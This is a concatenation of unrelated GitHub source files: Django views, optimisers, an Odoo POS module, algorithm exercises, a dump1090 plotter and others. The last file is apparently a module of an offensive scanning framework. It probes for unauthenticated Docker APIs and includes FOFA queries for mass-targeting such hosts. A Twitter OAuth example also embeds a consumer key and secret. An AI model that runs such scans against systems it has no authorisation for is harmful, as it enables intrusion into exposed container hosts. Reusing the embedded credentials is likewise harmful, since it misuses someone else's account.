'emnosys/addcontacts.html')\n\n\n##################################\n\n\ndef CreateListOfContacts(request):\n    username = request.user.username\n    all_contacts = Contact.objects.filter(contactowner__username=username)\n    return all_contacts\n\n\n##################################\n\n\ndef SendEmailView(request):\n    all_contacts = CreateListOfContacts(request)\n    for cntct in all_contacts:\n        personalized_message = cntct.message\n        email = EmailMessage(\n            'Someone used our application to send you this emergency message!',\n            personalized_message,\n            'emnosy.wqrfl@gmail.com',\n            [cntct.email],\n        )\n        email.content_subtype = 'html'  # Set the content type to HTML\n        email.send(fail_silently=False)\n\n    return redirect('/')\n\n\n##################################\n\n\ndef CreateJsonWithNamesView():\n    users = User.objects.all()\n    data = {}  # accumulator for the per-user entries (was missing: NameError)\n    for i, user in enumerate(users, start=1):\n        data['user' + str(i)] = {  # str(i): 'user' + i raises TypeError\n            'username': user.username\n        }\n    json_data = json.dumps(data)\n    return HttpResponse(json_data, content_type='application/json')\n\n\n#######################################################################\n
","repo_name":"YukkieWQR/emnosys_wqrfl","sub_path":"emnosys/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75008029207","text":"import cma\nfrom scipy.optimize import differential_evolution as scipy_de\nfrom scipy.optimize import minimize\nimport numpy as np\n\nWORKLOAD_FACTOR = 0.001\n\n\ndef objective_f(loads, *args):\n    '''objective function to be minimized'''\n    goal = args[0]\n    model_perf_func = args[1]\n    model_parameters = args[2]\n    training_days = args[3]\n    plan_length = args[4]\n    prequel_plan = args[5]\n    pp_func = args[6]\n    plan = map_loads_to_training_days(loads, training_days, plan_length)\n    plan = pp_func(plan)\n    plan_perf = model_perf_func(prequel_plan + plan, **model_parameters)\n    total_workload = sum(plan)\n    fitness_wo_load = abs(goal - plan_perf)\n    fitness_with_load = fitness_wo_load + WORKLOAD_FACTOR * total_workload\n    return fitness_with_load\n\n\ndef map_loads_to_training_days(loads, training_days, plan_length):\n    plan = [0.0] * plan_length\n    for i, l in zip(training_days, loads):\n        plan[i] = l\n    return plan\n\n\ndef genplan(length,  # in weeks\n            goal,\n            training_days,\n            max_load,\n            model_func,\n            prequel_plan,\n            pp_func,\n            **model_parameters):\n    '''generate a plan with cma.fmin'''\n    x0 = [0.0] * len(training_days)\n    options = cma.CMAOptions()\n    options.set('bounds', [0.0, max_load])\n    # options.set('verb_disp', 0)\n    # options.set('verbose', -9)\n    # options.set('verb_log', 0)\n    # options.set('maxiter', 800)\n    args = (goal, model_func, model_parameters, training_days, length * 7,\n            prequel_plan, pp_func)\n    print('max_load {}'.format(max_load))\n    sigma = max_load / 4\n    solution = cma.fmin(objective_f, x0, sigma, args=args, options=options)\n    plan = map_loads_to_training_days(solution[0], training_days, length * 7)\n    return plan\n\n\ndef genplan_de(length,  # in weeks\n               goal,\n               training_days,\n               max_load,\n               model_func,\n               prequel_plan,\n               pp_func,\n               **model_parameters):\n    bounds = [(0, max_load)] * len(training_days)\n    args = (goal, model_func, model_parameters, training_days, length * 7,\n            prequel_plan, pp_func)\n    solution = scipy_de(objective_f,\n                        bounds, args=args,\n                        mutation=(1, 1.99),\n                        recombination=0.5,\n                        disp=True)\n    solution.x = pp_func(solution.x)\n    plan = map_loads_to_training_days(solution.x, training_days, length * 7)\n    return plan\n\n\ndef genplan_minimize(length,  # in weeks\n                     goal,\n                     training_days,\n                     max_load,\n                     model_func,\n                     prequel_plan,\n                     pp_func,\n                     **model_parameters):\n    x0 = np.array([0.0] * len(training_days))  # initial guess\n    args = (goal, model_func, model_parameters, training_days, length * 7,\n            prequel_plan, pp_func)\n    bounds = [(0.0, max_load)] * len(training_days)\n    options = {'maxiter': 400, 'disp': False}\n\n    def iter_callback(xk):\n        print(\"current parameter vector: {}\".format(xk))\n\n    optres = minimize(objective_f,\n                      x0,\n                      args,\n                      'L-BFGS-B',\n                      bounds=bounds,\n                      options=options,\n                      callback=iter_callback)\n    return 
optres\n","repo_name":"dawedawe/traipor","sub_path":"app/training/cmaes_planning.py","file_name":"cmaes_planning.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15113983560","text":"from django.shortcuts import render\r\nfrom app.forms import Anprform\r\nfrom app.lpr import detect\r\nfrom django.conf import settings\r\nfrom app.models import Anpr\r\nimport os\r\n\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n form = Anprform()\r\n\r\n if request.method == 'POST':\r\n form = Anprform(request.POST or None, request.FILES or None)\r\n if form.is_valid():\r\n save = form.save(commit=True)\r\n\r\n primary_key = save.pk\r\n imgobj = Anpr.objects.get(pk=primary_key)\r\n fileroot = str(imgobj.image)\r\n filepath = os.path.join(settings.MEDIA_ROOT, fileroot)\r\n results = detect(filepath)\r\n print(results)\r\n return render(request, \"index.html\",{'form':form, 'upload':True,'results':results})\r\n\r\n return render(request, \"index.html\",{'form':form, 'upload':False})\r\n","repo_name":"Atin-123/number-plate-recognition","sub_path":"anpr/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4878853671","text":"from collections import deque\nfrom collections import defaultdict\n\nclass Solution:\n \"\"\"\n @param org: a permutation of the integers from 1 to n\n @param seqs: a list of sequences\n @return: true if it can be reconstructed only one or false\n \"\"\"\n def sequenceReconstruction(self, org, seqs):\n graph = self.build_graph(seqs)\n if len(org) != len(graph):\n return False\n indegrees = self.get_indegrees(graph)\n return self.can_reconstuct(org, graph, indegrees)\n\n def can_reconstuct(self, org, graph, indegrees):\n queue = deque()\n visited = set()\n for node, v in indegrees.items():\n if v == 0:\n visited.add(node)\n queue.append(node)\n order = []\n while queue:\n if len(queue) != 1:\n return False\n head = queue.popleft()\n order.append(head)\n for nb in graph[head]:\n if nb in visited:\n continue\n indegrees[nb] -= 1\n if indegrees[nb] == 0:\n queue.append(nb)\n return order == org\n\n def build_graph(self, seqs):\n graph = {}\n for li in seqs:\n for i in li:\n graph[i] = []\n\n for li in seqs:\n for i in range(1, len(li)):\n graph[li[i-1]].append(li[i])\n return graph\n\n def get_indegrees(self, graph):\n indegrees = defaultdict(int)\n for node, nbs in graph.items():\n if node not in indegrees:\n indegrees[node] = 0\n for nb in nbs:\n indegrees[nb] += 1\n return indegrees","repo_name":"ZhouningMan/LeetCodePython","sub_path":"bfs/SequenceReconstruction.py","file_name":"SequenceReconstruction.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26619562793","text":"#!/usr/bin/env python\n\"\"\"Utility to create a folder with opt_cif_ddec CIFs.\"\"\"\nimport os\nfrom aiida.orm.querybuilder import QueryBuilder\nfrom aiida.orm import Group, CifData\n\nfrom pipeline_config import load_profile\nload_profile()\n\nTAG_KEY = \"tag4\"\nCIFS_DIR = \"./cifs_cellopt/\"\n\nos.mkdir(CIFS_DIR)\n\nqb = QueryBuilder()\nqb.append(Group, project=['label'], filters={'label': {'like': r\"curated-cof\\_%\"}}, tag='group')\nqb.append(CifData, project=['*'], filters={'extras.{}'.format(TAG_KEY): 'opt_cif_ddec'}, 
with_group='group')\nqb.order_by({CifData: {'label': 'asc'}})\n\nfor q in qb.all():\n mat_id = q[0].split(\"_\")[1]\n ddec_cif = q[1]\n ddec_cif.label = mat_id + \"_DDEC\"\n filename = '{}_ddec.cif'.format(mat_id)\n cifile = open(os.path.join(CIFS_DIR, filename), 'w+')\n print(ddec_cif.get_content(), file=cifile)\n print(\"{},{}\".format(mat_id, ddec_cif))\n","repo_name":"materialscloud-org/discover-curated-cofs","sub_path":"make_export/create_cif_opt_dir.py","file_name":"create_cif_opt_dir.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"3200452383","text":"from rauth import OAuth1Service\n \ntry:\n read_input = raw_input\nexcept NameError:\n read_input = input\n \n# Get a real consumer key & secret from https://dev.twitter.com/apps/new\ntwitter = OAuth1Service(\n name='twitter',\n consumer_key='J8MoJG4bQ9gcmGh8H7XhMg',\n consumer_secret='7WAscbSy65GmiVOvMU5EBYn5z80fhQkcFWSLMJJu4',\n request_token_url='https://api.twitter.com/oauth/request_token',\n access_token_url='https://api.twitter.com/oauth/access_token',\n authorize_url='https://api.twitter.com/oauth/authorize',\n base_url='https://api.twitter.com/1.1/')\n \nrequest_token, request_token_secret = twitter.get_request_token()\n \nauthorize_url = twitter.get_authorize_url(request_token)\n \nprint('Visit this URL in your browser: {url}'.format(url=authorize_url))\npin = read_input('Enter PIN from browser: ')\n \nsession = twitter.get_auth_session(request_token,\n request_token_secret,\n method='POST',\n data={'oauth_verifier': pin})\n \nparams = {'include_rts': 1, # Include retweets\n 'count': 10} # 10 tweets\n \nr = session.get('statuses/home_timeline.json', params=params, verify=True)\n \nfor i, tweet in enumerate(r.json(), 1):\n handle = tweet['user']['screen_name']\n text = tweet['text']\n print(u'{0}. 
@{1} - {2}'.format(i, handle, text))\n","repo_name":"litl/rauth","sub_path":"examples/twitter-timeline-cli.py","file_name":"twitter-timeline-cli.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"31"} +{"seq_id":"19065284209","text":"from django.contrib import admin\nfrom .models import Course, Tray, History\n# Register your models here.\n\n\nclass CourseAdmin(admin.ModelAdmin):\n    fieldsets = [\n        (None, {'fields': ['course_name']}),\n        (None, {'fields': ['course_description']}),\n        (None, {'fields': ['course_category']}),\n        (None, {'fields': ['course_unit']}),\n        (None, {'fields': ['course_price']}),\n    ]\n\n\nclass TrayAdmin(admin.ModelAdmin):\n    # attribute was misspelled 'fieldssets', which Django silently ignores\n    fieldsets = [\n        (None, {'fields': ['created_date']}),\n        (None, {'fields': ['tray_cumulative_price']}),\n    ]\n\n\nclass HistoryAdmin(admin.ModelAdmin):\n    fieldsets = [\n        (None, {'fields': ['history_points']}),\n    ]\n\n\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(Tray, TrayAdmin)\nadmin.site.register(History, HistoryAdmin)\n","repo_name":"jemartpacilan/Catr","sub_path":"orders/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15191151678","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError, Warning\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport datetime\nimport pytz\n\nDEFAULT_TIMEZONE = 'America/Lima'\n\nclass PosConfiguration(models.Model):\n    _inherit = 'pos.config'\n    \n    check = fields.Boolean(string='Import Sale Order', default=False)\n    load_orders_days = fields.Integer('Load Orders of Last Days')\n\nclass InheritPOSOrder(models.Model):\n    _inherit = 'pos.order'\n    \n    def search_all_sale_order(self, config_id, l_date):\n        final_order = []\n        last_day = datetime.datetime.strptime(l_date, DEFAULT_SERVER_DATETIME_FORMAT)\n        config = self.env['pos.config'].browse(config_id)\n        #if config.load_orders_days > 0:\n        #    sale_orders = self.env['sale.order'].search([('date_order','>=',last_day)])\n        #    domain.append(('date_order','>=',last_day))\n        #else:\n        #    sale_orders = self.env['sale.order'].search([])\n        domain = [('company_id', '=', config.company_id.id), ('currency_id', '=', config.currency_id.id)]\n        if config.load_orders_days > 0:\n            domain.append(('date_order', '>=', last_day))\n        sale_orders = self.env['sale.order'].sudo().search(domain)\n        for s in sale_orders:\n            vals1 = {\n                'id': s.id,\n                'name': s.name,\n                'state': s.state,\n                'partner_id': [s.partner_id.id, s.partner_id.name],\n                'user_id': [s.user_id.id, s.user_id.name],\n                'amount_untaxed': s.amount_untaxed,\n                'order_line': s.order_line.ids,\n                'amount_tax': s.amount_tax,\n                'amount_total': s.amount_total,\n                'company_id': [s.company_id.id, s.company_id.name],\n                #'date_order': s.date_order,\n                # render the order date in the user's timezone for the POS UI\n                'date_order': s.date_order.astimezone(pytz.timezone(self.env.user.tz or DEFAULT_TIMEZONE)).strftime('%d/%m/%Y, %H:%M:%S'),\n            }\n            final_order.append(vals1)\n        return final_order\n    \n    def return_new_order_line(self):\n        orderlines = self.env['sale.order.line'].search([('order_id.id', '=', self.id)])\n        final_lines = []\n        for l in orderlines:\n            vals1 = {\n                'discount': l.discount,\n                'id': l.id,\n                'order_id': [l.order_id.id, l.order_id.name],\n                'price_unit': l.price_unit,\n                'product_id': [l.product_id.id, l.product_id.name],\n                'product_uom_qty': l.product_uom_qty,\n                'price_subtotal': l.price_subtotal,\n            }\n
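            # building plain dicts keeps the POS front end decoupled from the ORM recordsets\n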
            final_lines.append(vals1)\n        return final_lines\n    \n    def sale_order_line(self):\n        orderlines = self.env['sale.order.line'].sudo().search([])\n        final_lines = []\n        for l in orderlines:\n            vals1 = {\n                'discount': l.discount,\n                'id': l.id,\n                'order_id': [l.order_id.id, l.order_id.name],\n                'price_unit': l.price_unit,\n                'product_id': [l.product_id.id, l.product_id.name],\n                'product_uom_qty': l.product_uom_qty,\n                'price_subtotal': l.price_subtotal,\n            }\n            final_lines.append(vals1)\n        return final_lines\n","repo_name":"MeditechSolutions/pruebagntrky-e","sub_path":"bi_pos_import_sale/models/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12618930468","text":"import json\nfrom os import environ\n\nimport requests\n\n# get api key from https://dashboard.api-football.com/soccer/tester\nAPI_KEY = environ.get(\"API_KEY\")\n\n\ndef call_api(url, api_key=API_KEY):\n    \"\"\"send request to api and return data dictionary\"\"\"\n    # ucl league id = 2\n    headers = {\n        \"x-rapidapi-host\": \"v3.football.api-sports.io\",\n        \"x-rapidapi-key\": api_key,\n    }\n    res = requests.get(url, headers=headers)\n\n    data = res.json()\n    return data\n\n\ngroup_data = call_api(\n    \"https://v3.football.api-sports.io/standings?league=2&season=2021\"\n)\n\ngroup_standings = group_data[\"response\"][0][\"league\"][\"standings\"]\n\n\n# dump to file\nwith open(\"ucl-groups-2021.json\", \"w+\") as f:\n    f.write(json.dumps(group_standings))\n\nteam_data = call_api(\n    \"https://v3.football.api-sports.io/teams?league=2&season=2021\"\n)\n\n# add team id as key of team dict\nindexed_team_data = {}\nfor team in team_data[\"response\"]:\n    indexed_team_data[team[\"team\"][\"id\"]] = team\n\n# dump to file\nwith open(\"ucl-teams-2021.json\", \"w+\") as f:\n    f.write(json.dumps(indexed_team_data))\n","repo_name":"ismailmo1/ucl-draw","sub_path":"src/data/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28205901441","text":"# -*- coding: utf-8 -*-\n# Find prime numbers\n\n'''\nCreated on Feb 20, 2016\n\n@author: xuyi\n'''\n\ndef primes():\n    yield 2\n    it = _odd_iter()\n    while True:\n        n = next(it)\n        yield n\n        it = filter(_not_divisable(n), it)\n\ndef _odd_iter():\n    n = 1\n    while True:\n        n = n + 2\n        yield n\n\ndef _not_divisable(n):\n    return lambda x: x % n > 0\n\nif __name__ == '__main__':\n    for n in primes():\n        if n < 1000:\n            print(n)\n        else:\n            break\n    pass","repo_name":"MyXOF/learn-py","sub_path":"function-program/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40847865961","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().strip().split())\ngraph = [[] for _ in range(N)]\nfor _ in range(M):\n    a, b = map(int, sys.stdin.readline().strip().split())\n    graph[a].append(b)\n    graph[b].append(a)\n    \ndef dfs(visited, u, depth):\n\n    visited[u] = True\n    \n    if depth >= 5:\n        return True\n    \n    for v in graph[u]:\n        if visited[v] == False:\n            if dfs(visited, v, depth+1):\n                return True\n            visited[v] = False\n    \n    return False\n\nfor i in range(N):\n    visited = [False]*N\n    if dfs(visited, i, 1):\n        print(1)\n        exit()\n    \nprint(0)\n\n''' review\nThis cannot be solved with BFS.\n4 4\n0 1\n1 2\n2 3\n3 0\nIn a case like this a cycle occurs, so the depth only ever reaches 3.\n\nIn particular, resetting 
visited[v] = False after the dfs call is important,\nbecause the node can be visited again along a different path.\n'''","repo_name":"euroversedev/BaekJoonOJ_Python","sub_path":"Searching/13023_3.py","file_name":"13023_3.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7772037532","text":"#!/usr/bin/python3\n\"\"\"This module has functions for the infamous N-queens problem\"\"\"\nimport sys\n\n\ndef checkPos(board, pos):\n    \"\"\"Function to check if a position is valid for a queen\"\"\"\n    for r in range(pos[0]):\n        if board[r][pos[1]] == 1:\n            return False\n\n    for r, p in zip(range(pos[0], -1, -1), range(pos[1], -1, -1)):\n        if board[r][p] == 1:\n            return False\n\n    for r, p in zip(range(pos[0], -1, -1), range(pos[1], len(board), 1)):\n        if board[r][p] == 1:\n            return False\n\n    return True\n\n\ndef nqueens(board, row, solutions):\n    \"\"\"Recursive function to try board layouts\"\"\"\n    if row == len(board):\n        solutions.append(conv(board))\n\n    for r in range(len(board)):\n        if checkPos(board, (row, r)) is True:\n            board[row][r] = 1\n            nqueens(board, row + 1, solutions)\n            board[row][r] = 0\n\n\ndef conv(sol):\n    \"\"\"Function to convert styles of board descriptions\"\"\"\n    fin = []\n    for r in range(len(sol)):\n        fin.append([])\n        fin[r].append(r)\n        for p in range(len(sol)):\n            if sol[r][p] == 1:\n                fin[r].append(p)\n                break\n    return fin\n\n\ndef main():\n    \"\"\"Main function to check args and call recursion\"\"\"\n    if len(sys.argv) != 2:\n        print(\"Usage: nqueens N\")\n        sys.exit(1)\n    try:\n        number = int(sys.argv[1])\n    except ValueError:\n        print(\"N must be a number\")\n        sys.exit(1)\n    if number < 4:\n        print(\"N must be at least 4\")\n        sys.exit(1)\n    board = [[0] * number for x in range(number)]\n    sols = []\n    nqueens(board, 0, sols)\n    for x in sols:\n        print(x)\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"haru-voster/alx-higher_level_programming","sub_path":"0x08-python-more_classes/101-nqueens.py","file_name":"101-nqueens.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42994370285","text":"#!/usr/bin/env python\n\nimport csv, math, os\nfrom contextlib import closing\nfrom PIL import Image, ImageDraw, ImageFont\n\ndata = []\nmax_rate = 0.0\nmax_range = 0.0\n\nwith closing(open('polar_range.csv', 'r')) as f:\n    r = csv.reader(f)\n    r.next() # header\n    for row in r:\n        b_start = float(row[0])\n        b_end = float(row[1])\n        r_start = float(row[2])\n        r_end = float(row[3])\n        updates = float(row[4])\n        airsec = float(row[5])\n        if airsec > 2.0:\n            rate = float(updates) / airsec\n        else:\n            rate = 0.0\n\n        if rate > 0:\n            data.append( (b_start, b_end, r_start, r_end, rate) )\n            max_rate = max(max_rate, rate)\n\ndata.append( (0,0,0,0,0) )\ndata.sort(lambda x,y: cmp( (y[3],x[0],y[2]), (x[3],y[0],x[2]) ) )\n\nfor s_start, s_end, r_start, r_end, rate in data:\n    if rate > 1.0:\n        max_range = r_end\n        break\n\nmax_range = 360000.0\nmax_rate = 2.0\n\ndef color_for(x):\n    if x == 0.0:\n        return 'black'\n    else:\n        if x < 0.1: intensity = 0\n        else: intensity = (1.0 * x / max_rate) ** 0.8\n        return \"hsl(%d,%d%%,%d%%)\" % (0 + int(0 + intensity * 180), 100, int(30 + intensity*50)) \n\nSIZE = 800\nSCALE = ((SIZE-10) / max_range / 2)\nCENTER = SIZE/2\nim = Image.new(\"RGB\", (SIZE + 730,SIZE), \"black\")\n\ndraw = ImageDraw.Draw(im)\n\nlast_r_start = data[0][2]\nlast_r_end = data[0][3]\nlast_s_end = None\nfor s_start, s_end, r_start, r_end, rate in data:\n    if r_end != last_r_end:\n        # 
finish partial ring\n # if last_s_end is not None:\n # bounds = (int(CENTER - last_r_end * SCALE),\n # int(CENTER - last_r_end * SCALE),\n # int(CENTER + last_r_end * SCALE),\n # int(CENTER + last_r_end * SCALE)) \n # draw.pieslice(bounds, int(last_s_end-90), int(360-90), fill = '#101010')\n \n # clear inner part\n bounds = (int(CENTER - last_r_start * SCALE),\n int(CENTER - last_r_start * SCALE),\n int(CENTER + last_r_start * SCALE),\n int(CENTER + last_r_start * SCALE)) \n draw.ellipse(bounds, fill = '#101010')\n\n last_r_start = r_start\n last_r_end = r_end\n last_s_end = None\n\n # if last_s_end is not None and s_start != last_s_end:\n # bounds = (int(CENTER - r_end * SCALE),\n # int(CENTER - r_end * SCALE),\n # int(CENTER + r_end * SCALE),\n # int(CENTER + r_end * SCALE)) \n # draw.pieslice(bounds, int(last_s_end-90), int(s_start-90), fill = '#101010')\n\n bounds = (int(CENTER - r_end * SCALE),\n int(CENTER - r_end * SCALE),\n int(CENTER + r_end * SCALE),\n int(CENTER + r_end * SCALE)) \n draw.pieslice(bounds, int(s_start - 90), int(s_end-90), fill = color_for(rate))\n last_s_end = s_end\n\nfont = ImageFont.load_default()\nfor r in xrange(0, int(max_range) + 100000, 100000):\n bounds = (int(CENTER - r * SCALE),\n int(CENTER - r * SCALE),\n int(CENTER + r * SCALE),\n int(CENTER + r * SCALE))\n draw.ellipse(bounds, outline=\"#FFFFFF\")\n\n if r > 0:\n text = '%.0f km' % (r/1000.0)\n size = font.getsize(text)\n draw.text((CENTER + 5, CENTER - r * SCALE - 5 - size[1]), text, font=font, fill=\"#FFFFFF\")\n\ntext1 = 'Rate: 0'\nsize1 = font.getsize(text1)\ntext2 = '%.1f updates/s/aircraft' % max_rate\nsize2 = font.getsize(text2)\n\ndraw.text((5, 5), text1)\ndraw.text((5 + size1[0] + 5 + 102 + 5, 5), text2)\ndraw.rectangle((5 + size1[0] + 5, 5, 5 + size1[0] + 5 + 101, 5 + size1[1]), outline='#FFFFFF')\nfor i in xrange(0,100):\n c = i * max_rate / 100\n draw.line((5 + size1[0] + 5 + 1 + i, 6, 5 + size1[0] + 5 + 1 + i, 4 + size1[1]), fill=color_for(c))\n\nedata = []\nmin_elev = -5.0\nmax_elev = 0\nwith closing(open('polar_elev.csv', 'r')) as f:\n r = csv.reader(f)\n r.next() # header\n for row in r:\n b_start = float(row[0])\n b_end = float(row[1])\n e_start = float(row[2])\n e_end = float(row[3])\n count = float(row[4])\n unique = float(row[5])\n if unique > 0:\n rate = count / unique\n else:\n rate = 0.0\n\n if rate > 0:\n edata.append( (b_start, b_end, e_start, e_end, rate) )\n max_elev = max(e_end, max_elev)\n min_elev = min(e_start, min_elev)\n\nmin_elev = -5.0\nmax_elev = 90.0\n\nESCALE = -1.0 * SIZE / (max_elev - min_elev)\nEZERO = int(-1.0 * max_elev * ESCALE)\n\ndraw.rectangle( (SIZE,0,SIZE+730,SIZE), fill='black' )\n\nfor i in xrange(0,361,30):\n draw.line( (SIZE+5+i*2,\n EZERO+int(ESCALE*min_elev),\n SIZE+5+i*2,\n EZERO+int(ESCALE*max_elev)),\n fill='#202020' )\n\ni = 0.0\nwhile i < max_elev:\n draw.line( (SIZE+5,\n EZERO+int(ESCALE*i),\n SIZE+725,\n EZERO+int(ESCALE*i)),\n fill='#202020' )\n i += 5.0\n\ni = 0.0\nwhile i > min_elev:\n draw.line( (SIZE+5,\n EZERO+int(ESCALE*i),\n SIZE+725,\n EZERO+int(ESCALE*i)),\n fill='#202020' )\n i -= 5.0\n\nfor bs, be, es, ee, rate in edata:\n x1 = int(bs)*2 + SIZE+5\n x2 = int(be)*2 + SIZE+5\n y1 = EZERO + int(ESCALE * es)\n y2 = EZERO + int(ESCALE * ee)\n \n draw.rectangle( (x1,y1,x2,y2), fill=color_for(rate) )\n\ndraw.line( (SIZE+5,EZERO,SIZE+725,EZERO), fill='white' )\nfor i in xrange(0,361,30):\n draw.line( (SIZE+5+i*2,EZERO,SIZE+5+i*2,EZERO+5), fill='white' )\n text = '%03d' % i\n size = font.getsize(text)\n draw.text((SIZE+5+i*2 - 
size[0]/2, EZERO+10), text)\n\n\ndel draw\n\n#im.save(\"polar-new.png\")\n#os.rename(\"polar-new.png\", \"polar.png\")\nim.save(\"polar.png\")\n","repo_name":"mutability/dump1090-tools","sub_path":"polar-plots/adsb-polar-plot.py","file_name":"adsb-polar-plot.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"31"} +{"seq_id":"364452635","text":"\"\"\"\n1383. Maximum Performance of a Team\nYou are given two integers n and k and two integer arrays speed and efficiency both of length n. There are n engineers numbered from 1 to n. speed[i] and efficiency[i] represent the speed and efficiency of the ith engineer respectively.\n\nChoose at most k different engineers out of the n engineers to form a team with the maximum performance.\n\nThe performance of a team is the sum of their engineers' speeds multiplied by the minimum efficiency among their engineers.\n\nReturn the maximum performance of this team. Since the answer can be a huge number, return it modulo 10^9 + 7.\n\nExample 1:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 2\nOutput: 60\nExplanation: \nWe have the maximum performance of the team by selecting engineer 2 (with speed=10 and efficiency=4) and engineer 5 (with speed=5 and efficiency=7). That is, performance = (10 + 5) * min(4, 7) = 60.\n\nExample 2:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 3\nOutput: 68\nExplanation:\nThis is the same example as the first but k = 3. We can select engineer 1, engineer 2 and engineer 5 to get the maximum performance of the team. That is, performance = (2 + 10 + 5) * min(5, 4, 7) = 68.\n\nExample 3:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 4\nOutput: 72\n\nConstraints:\n1 <= k <= n <= 10^5\nspeed.length == n\nefficiency.length == n\n1 <= speed[i] <= 10^5\n1 <= efficiency[i] <= 10^8\n\"\"\"\n\"\"\"\nWorked example: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 2\n\nsorted by efficiency, descending:\nefficiency = [9, 7, 5, 4, 3, 2]\nspeed      = [1, 5, 2, 10, 3, 8]\n\ncurrent = 42 (after first 2)\nsum = 6\nheap [1, 5]\n\nif (speed[i]+sum-heap[0])*efficiency[i] > current: then push and pop, update current\n\"\"\"\n# Time complexity: O(N * (log N + log K))\n# Space complexity: O(N+K)\nimport heapq\nfrom typing import List  # both imports are required and were missing\n\nclass Solution:\n    def maxPerformance(self, n: int, speed: List[int], efficiency: List[int], k: int) -> int:\n        combined = sorted(zip(efficiency, speed), reverse=True)\n        heap = []\n        performance = total_vel = 0\n\n        for eff, vel in combined:\n            if len(heap) > k-1:\n                total_vel -= heapq.heappop(heap)\n            \n            heapq.heappush(heap, vel)\n            total_vel += vel\n            performance = max(total_vel*eff, performance)\n        return performance%(10**9+7)\n","repo_name":"victorplusc/Algorithms","sub_path":"Leetcode/1383. 
Maximum Performance of a Team.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9988871906","text":"# coding=utf-8\n# @Author : zpchcbd HG team\n# @Time : 2021-08-27 18:36\nfrom urllib.parse import urlparse\n\nfrom colorama import Fore\nfrom tqdm import tqdm\n\nfrom exploit.web import BaseScript\nfrom core.MyEnums import *\nfrom core.request.asynchttp import *\n\n\n# fofa: app=\"docker-产品\"\n# python batch.py -m exploit.web.Unauth.Docker.Unauth -cs -fs \"app=\\\"docker-产品\\\"\"\n\n# fofa: port=\"2375\"\n# python batch.py -m exploit.web.Unauth.Docker.Unauth -cs -fs \"port=\\\"2375\\\" app=\\\"docker\\\"\"\n\nclass Script(BaseScript):\n name = 'Docker'\n\n def __init__(self, target, session):\n super().__init__()\n # 漏洞目标\n self.target = target\n # 漏洞等级\n self.bugLevel = BugLevel.HIGH\n # 类型\n self.bugType = BugType.UNAUTH\n # 编号\n self.bugNumber = ''\n # 来源\n self.refer = ''\n # 特定路径判断\n self.detectPathList = [':2375/containers/json', '/containers/json']\n # exec\n # self.execPathList = ['/execPath']\n # session\n self.session = session\n # 相关信息\n self.info = ''\n\n async def detect(self):\n try:\n urlLen = len(f'http://{self.target}'.split(':'))\n if urlLen == 2:\n url = f'http://{self.target}{self.detectPathList[0]}' if self.target.startswith(\n ('http:', 'https:')) is False else f'{self.target}{self.detectPathList[0]}'\n elif urlLen == 3:\n url = f'http://{self.target}{self.detectPathList[1]}' if self.target.startswith(\n ('http:', 'https:')) is False else f'{self.target}{self.detectPathList[1]}'\n async with self.session.get(url=url, headers=self.headers, timeout=self.reqTimeout, verify_ssl=False) as response:\n if response is not None and response.status == 200:\n text = await response.text()\n await asyncio.sleep(2)\n if 'HostConfig' in text:\n self.flag = True\n tqdm.write(Fore.RED + '[{}] {}'.format('Docker Unauth', url))\n return {'name': 'Docker Unauth', 'url': url, 'software': 'Docker'}\n except Exception:\n return None\n\n # async def exec(self):\n # try:\n # async with aiohttp.ClientSession() as session:\n # for execPath in self.execPathList:\n # url = f'http://{self.target}{execPath}' if self.target.startswith(\n # ('http:', 'https:')) is False else f'{self.target}{execPath}'\n # async with session.get(url=url, timeout=self.reqTimeout, verify_ssl=False) as response:\n # if response is not None:\n # text = await response.text()\n # await asyncio.sleep(2)\n # if 'something about keywords in the web' in text:\n # tqdm.write(Fore.RED + '[{}] 